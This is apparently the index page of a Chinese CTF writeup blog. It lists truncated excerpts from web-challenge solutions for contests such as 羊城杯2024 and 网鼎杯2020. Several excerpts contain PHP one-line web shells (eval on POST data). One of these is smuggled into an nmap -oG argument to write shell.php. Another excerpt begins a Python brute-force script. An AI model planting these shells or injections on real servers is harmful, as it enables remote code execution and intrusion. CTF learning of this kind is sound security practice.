又学了一些
-
羊城杯2024
0x01 前言这几天比赛是不断的,虽然我输出少,但是咱还是得参与啊 0x02 questionLyrics For You扫描出来有两个路由/board和login,同时观察url,可能存在目录穿越 直接读取flag,失败发现可以载入代码在board,尝试载入小马 1<script language='php'>@eval($_POST[1]);</sc... -
[NewStarCTF 公开赛赛道]SSTI
SSTI部分
-
DASCTF2024八月
第一次DAS能通
-
GWCTF2019
打比赛打不过那就来浮现一个
-
安洵杯2019
[安洵杯 2019]easy_serialize_php12345678910111213141516171819202122232425262728293031323334353637383940<?php$function = @$_GET['f'];function filter($img){ $filter_arr = array('... -
网鼎杯2020朱雀组
[网鼎杯 2020 朱雀组]Think Javajava代审 [网鼎杯 2020 朱雀组]Nmap12nmap -oG 写入文件 nmap -iL读取扫描文件 黑盒但是随便测测应该就可以绕过了 12345678127.0.0.1'<?=eval($_POST[a]);?> -oG shell.php'Hacker...127.0.0.1'<?... -
bsidescf2020
[BSidesCF 2020]Bulls23先搞下来,解压发现是个html 本地搞个html网页来加载发现可以登录 发现第一个链接就是 1http://bash.org/?random 找到是websocket流量 发现第二个链接 1http://n-gate.com 中途发现端口是8888 但还是不懂,说的要追踪TCP流量,那就追踪 1tcp.stream eq 363 然后随便选一... -
网鼎杯2018
[网鼎杯 2018]Comment随便发帖发现进入后台,告诉了用户名和密码,只不过后三位需要爆破 由于前面是名字所以直接猜测是数字 123456789101112131415161718192021222324252627282930import requestsimport time# 定义URLurl = "http://97f3bfa3-d408-4ae9-b1ac-27b8... -
ciscn西南分区赛2024
给6.16的自己进个步